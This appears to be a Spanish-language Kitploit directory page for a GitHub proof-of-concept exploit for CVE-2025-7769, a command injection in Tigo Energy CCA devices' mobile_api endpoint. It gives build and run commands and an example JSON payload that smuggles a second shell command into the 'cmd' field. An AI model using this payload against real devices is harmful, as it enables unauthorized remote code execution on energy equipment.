Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-7769 — PoC para inyectar un comando a través del endpoint DEVICE_PING | Kitploit
Herramientas/GitHubGitHub/bytereaper77/cve-2025-7769
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingArchived
GitHubbytereaper77/cve-2025-7769

CVE-2025-7769

PoC para inyectar un comando a través del endpoint DEVICE_PING

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-7769 – Inyección Remota de Comandos en mobile_api

Descripción :

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE‑2025‑7769, una vulnerabilidad crítica de Inyección de Comandos remota encontrada en dispositivos Tigo Energy CCA que exponen el endpoint /cgi-bin/mobile_api.

La vulnerabilidad se desencadena mediante la inyección de comandos del sistema operativo a través de la clave JSON cmd, donde la entrada sin filtrar se concatena directamente en una llamada al sistema, permitiendo la ejecución remota completa de código (RCE) en el dispositivo.

Referencias :

  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-7769

Uso :

root@kitploit:~
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.

Use -u http://target.com if you want to pass a full base URL instead of IP/port.

Example Payload :

{
  "cmd": "DEVICE_PING;id",
  "dev": 2,
  "ver": 1
}

Licencia :

MIT License

Descargar herramienta